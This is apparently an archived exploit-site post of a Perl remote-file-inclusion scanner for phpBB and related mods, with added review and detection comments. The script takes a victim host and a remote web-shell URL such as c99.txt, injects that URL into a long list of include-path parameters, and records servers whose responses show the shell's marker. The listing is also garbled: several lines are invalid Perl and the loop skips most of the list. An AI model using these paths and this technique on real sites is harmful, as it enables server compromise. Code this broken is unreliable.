
phpBB RFI Scanner 27.9

phpBB RFI Scanner 27.9
Posted Oct 27, 2010
Authored by jos_ali_joe

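This is a phpBB remote file inclusion scanner written in Perl. It requests a hard-coded list of script paths on one host, placing an operator-supplied URL in include-path parameters such as phpbb_root_path, and logs a URL as vulnerable when a chosen marker string appears in the response. The listing as posted contains syntax errors and does not run unmodified.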

tags | tool, remote, scanner, perl, file inclusion
systems | unix
SHA-256 | 93a467b53eb62570fc5e92ff28d8edecb743efdb81ac154adda4586ccb58ad9c

phpBB RFI Scanner 27.9

#!/usr/bin/perl

############################################################
#RFI Scanner Perl PHPbb - v27.9 #
#Coded by jos_ali_joe RFI Scanner Perl #
#Indonesian Docer Team #
#Contact: josalijoe@yahoo.com #
#Explore Crew - Indonesian Coder - Devilz COde - IH - HN #
#ATEN4 : N4ck0 - Aury - TeRRenJr - aphe-aphe - Rafael #
############################################################

use HTTP::Request;
use LWP::UserAgent;

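# Clear the terminal before the banner is printed; on Windows also set the
# console title and colour.
#
# Takes no arguments. Its only effects are the system() calls below, and the
# one call site in this file ignores the return value.
sub lw
{
    # $^O is exactly 'MSWin32' on native Windows. The earlier substring test
    # for "win" also matched "darwin" (macOS) and "cygwin", which sent those
    # platforms down the cls/title/color branch.
    if ($^O eq 'MSWin32') {
        system("cls");
        system("title RFI Scanner Perl PHPbb - v27.9 ");
        system("color 02");
    }
    else {
        system("clear");
    }
    return;
}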

# Interactive setup: clear the screen, print the banner, then read three
# values from STDIN -- the base URL to probe, the remote URL to place in the
# include parameter, and the marker string looked for in responses.
# The file has no "use strict" / "use warnings", so $host, $shell and $string
# are package globals and typos in variable names go unreported.

# Legacy call form: "&lw;" with no parentheses passes the current @_ through.
&lw;

print "\t\t########################################################\n\n";
print "\t\t## RFI Scanner PHPbb v27.9 IDC ##\n\n";
print "\t\t## by jos_ali_joe ##\n\n";
print "\t\t## special thanks : gunslinger_ Mywisdom ##\n\n";
print "\t\t########################################################\n\n";


print "Insert host:(ex: http://www.maho.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";

# If the url doesn't have http: at the beginning
# (only the literal prefix "http:" is recognised by this test)
if ( $host !~ /^http:/ ) {

# we add it
$host = 'http://' . $host;
}

# If the url doesn't have / at the end
# NOTE(review): the pattern on the next line is garbled as posted (it reads as
# an empty match followed by stray characters) and is not valid Perl.
if ( $host !~ //$/ ) {

# we add it
$host = $host . '/';
}


print "Insert shell:(ex: http://www.maho.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";

# If the url doesn't have http: at the beginning
if ( $shell !~ /^http:/ ) {

# we add it
$shell = 'http://' . $shell;
}


# The marker string is later used as a regular expression against each
# response body.
print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";

print "Your config:\n\n";

print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";

print "Scan...\n\n";

# Probe table: each $vulnN holds a script path plus the query-string parameter
# whose value the scan loop fills with the remote URL typed at the prompt.
#
# Defensive use: these path/parameter pairs are what to search for in web
# server access logs -- a GET in which one of these parameters carries an
# http:// value is a remote-file-inclusion probe. With PHP's
# allow_url_include left Off, include()/require() refuse remote URLs.
#
# Observations on the table as posted: many entries repeat (for example
# /includes/functions.php?phpbb_root_path= appears several times), there is
# no $vuln27, some entries lack a leading slash, and not every entry uses a
# phpBB parameter (foing_root_path, m2f_root_path, mosConfig_absolute_path
# and smf_root_path are also present).
$vuln1="/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=";
$vuln2="/includes/functions_portal.php?phpbb_root_path=";
$vuln3="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln4="/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=";
$vuln5="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";
$vuln6="/language/lang_german/lang_main_album.php?phpbb_root_path=";
$vuln7="/link_main.php?phpbb_root_path=";
$vuln8="/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=";
$vuln9="MOD_forum_fields_parse.php?phpbb_root_path=";
$vuln10="/codebb/pass_code.php?phpbb_root_path=";
$vuln11="/codebb/lang_select?phpbb_root_path=";
$vuln12="/includes/functions_nomoketos_rules.php?phpbb_root_path=";
$vuln13="/includes/functions.php?phpbb_root_path=";
$vuln14="/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln15="/ezconvert/config.php?ezconvert_dir=";
$vuln16="/includes/class_template.php?phpbb_root_path=";
$vuln17="/includes/usercp_viewprofile.php?phpbb_root_path=";
$vuln18="/includes/functions.php?phpbb_root_path=";
$vuln19="/menu.php?sesion_idioma=";
$vuln20="/includes/functions.php?phpbb_root_path=";
$vuln21="/admin/admin_linkdb.php?phpbb_root_path=";
$vuln22="/admin/admin_extensions.php?phpbb_root_path=";
$vuln23="/admin/admin_board.php?phpbb_root_path=";
$vuln24="/admin/admin_attachments.php?phpbb_root_path=";
$vuln25="/admin/admin_users.php?phpbb_root_path=";
$vuln26="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln28="/admin/modules_data.php?phpbb_root_path=";
$vuln29="/faq.php?foing_root_path=";
$vuln30="/index.php?foing_root_path=";
$vuln31="/list.php?foing_root_path=";
$vuln32="/login.php?foing_root_path=";
$vuln33="/playlist.php?foing_root_path=";
$vuln34="/song.php?foing_root_path=";
$vuln35="/gen_m3u.php?foing_root_path=";
$vuln36="/view_artist.php?foing_root_path=";
$vuln37="/view_song.php?foing_root_path=";
$vuln38="/login.php?foing_root_path=";
$vuln39="/flash/set_na.php?foing_root_path=";
$vuln40="/flash/initialise.php?foing_root_path=";
$vuln41="/flash/get_song.php?foing_root_path=";
$vuln42="/includes/common.php?foing_root_path=";
$vuln43="/admin/nav.php?foing_root_path=";
$vuln44="/admin/main.php?foing_root_path=";
$vuln45="/admin/list_artists.php?foing_root_path=";
$vuln46="/admin/index.php?foing_root_path=";
$vuln47="/admin/genres.php?foing_root_path=";
$vuln48="/admin/edit_artist.php?foing_root_path=";
$vuln49="/admin/edit_album.php?foing_root_path=";
$vuln50="/admin/config.php?foing_root_path=";
$vuln51="/admin/admin_status.php?foing_root_path=";
$vuln52="language/lang_english/lang_prillian_faq.php?phpbb_root_path=";
$vuln53="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln54="/language/lang_french/lang_prillian_faq.php?phpbb_root_path=";
$vuln55="/includes/archive/archive_topic.php?phpbb_root_path=";
$vuln56="/functions_rpg_events.php?phpbb_root_path=";
$vuln57="/admin/admin_spam.php?phpbb_root_path=";
$vuln58="/includes/functions_newshr.php?phpbb_root_path=";
$vuln59="/zufallscodepart.php?phpbb_root_path=";
$vuln60="/mods/iai/includes/constants.php?phpbb_root_path=";
$vuln61="/root/includes/antispam.php?phpbb_root_path=";
$vuln62="/phpBB2/shoutbox.php?phpbb_root_path=";
$vuln63="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln64="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln65="/includes/journals_delete.php?phpbb_root_path=";
$vuln66="/includes/journals_post.php?phpbb_root_path=";
$vuln67="/includes/journals_edit.php?phpbb_root_path=";
$vuln68="/includes/functions_num_image.php?phpbb_root_path=";
$vuln69="/includes/functions_user_viewed_posts.php?phpbb_root_path=";
$vuln70="/includes/themen_portal_mitte.php?phpbb_root_path=";
$vuln71="/includes/logger_engine.php?phpbb_root_path=";
$vuln72="/includes/logger_engine.php?phpbb_root_path=";
$vuln73="/includes/functions_static_topics.php?phpbb_root_path=";
$vuln74="/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=";
$vuln75="/includes/functions_kb.php?phpbb_root_path=";
$vuln76="/includes/bbcb_mg.php?phpbb_root_path=";
$vuln77="/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=";
$vuln78="/includes/pafiledb_constants.php?module_root_path=";
$vuln79="/index.php?phpbb_root_path=";
$vuln80="/song.php?phpbb_root_path=";
$vuln81="/faq.php?phpbb_root_path=";
$vuln82="/list.php?phpbb_root_path=";
$vuln83="/gen_m3u.php?phpbb_root_path=";
$vuln84="/playlist.php?phpbb_root_path=";
$vuln85="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln86="/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln87="/blend_data/blend_common.php?phpbb_root_path=";
$vuln88="/blend_data/blend_common.php?phpbb_root_path=";
$vuln89="/modules/Forums/admin/index.php?phpbb_root_path=";
$vuln90="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln91="/modules/Forums/admin/admin_board.php?phpbb_root_path=";
$vuln92="/modules/Forums/admin/admin_disallow.php?phpbb_root_path=";
$vuln93="/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=";
$vuln94="/modules/Forums/admin/admin_groups.php?phpbb_root_path=";
$vuln95="/modules/Forums/admin/admin_ranks.php?phpbb_root_path=";
$vuln96="/modules/Forums/admin/admin_styles.php?phpbb_root_path=";
$vuln97="/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=";
$vuln98="/modules/Forums/admin/admin_words.php?phpbb_root_path=";
$vuln99="/modules/Forums/admin/admin_avatar.php?phpbb_root_path=";
$vuln100="/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln101="/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=";
$vuln102="/modules/Forums/admin/admin_forums.php?phpbb_root_path=";
$vuln103="/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=";
$vuln104="/modules/Forums/admin/admin_smilies.php?phpbb_root_path=";
# NOTE(review): the next line is malformed as posted -- a second assignment is
# embedded in the string and the quotes do not balance, so the file does not
# parse.
$vuln105="$vuln58="/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=";
$vuln106="/modules/Forums/admin/admin_users.php?phpbb_root_path=";
$vuln107="/stat_modules/users_age/module.php?phpbb_root_path=";
$vuln108="/includes/functions_cms.php?phpbb_root_path=";
$vuln109="/m2f/m2f_phpbb204.php?m2f_root_path=";
$vuln110="/m2f/m2f_forum.php?m2f_root_path=";
$vuln111="/m2f/m2f_mailinglist.php?m2f_root_path=";
$vuln112="/m2f/m2f_cron.php?m2f_root_path=";
$vuln113="/lib/phpbb.php?subdir=";
$vuln114="/includes/functions_mod_user.php?phpbb_root_path=";
$vuln115="/includes/functions.php?phpbb_root_path=";
$vuln116="/includes/functions_portal.php?phpbb_root_path=";
$vuln117="/includes/functions.php?phpbb_root_path=";
$vuln118="/includes/functions_admin.php?phpbb_root_path=";
$vuln119="/toplist.php?f=toplist_top10&phpbb_root_path=";
$vuln120="/admin/addentry.php?phpbb_root_path=";
$vuln121="/includes/kb_constants.php?module_root_path=";
$vuln122="/auth/auth.php?phpbb_root_path=";
$vuln123="/auth/auth_phpbb/phpbb_root_path=";
$vuln124="/auction/auction_common.php?phpbb_root_path=";
$vuln125="/auth/auth_SMF/smf_root_path=";
$vuln126="/auth/auth.php?smf_root_path=";

# Scan loop. For each index it builds a variable name, resolves it through a
# symbolic reference ($$cont) to the matching $vulnN entry, and issues one GET
# for <host><path and parameter><remote URL>?.
# NOTE(review): the bound is $i<59, so only $vuln1..$vuln58 are requested even
# though the table in this file is numbered up to $vuln126.
# Detection notes: the script never sets a User-Agent, so LWP::UserAgent's
# default "libwww-perl/<version>" string is sent, and the requests arrive
# one after another from a single client, each with a URL as the parameter
# value.
for ($i=1;$i<59;$i++)

{

# Bareword "vuln" concatenated with the counter; this and the symbolic
# reference below only work because strict is not enabled.
$cont=vuln.$i;
chomp $cont;

print "$cont\n";

$final=$host.$$cont."$shell?";
# NOTE(review): the tokens "alias selesai" inside the argument list are not
# valid Perl; as posted this line is a syntax error.
my $req=HTTP::Request->new(GET=>$final alias selesai);
# A new user agent is created on every iteration, with a 30-second timeout.
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

# A hit is declared when a successful response body matches the marker string.
# $string is interpolated into the pattern unescaped, so any regex
# metacharacters in it are active.
if ($response->is_success) {
if( $response->content =~ /$string/){
# Hits are appended to results.txt in the current directory, using two-arg
# open with a bareword handle; the open() result is not checked.
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}

}
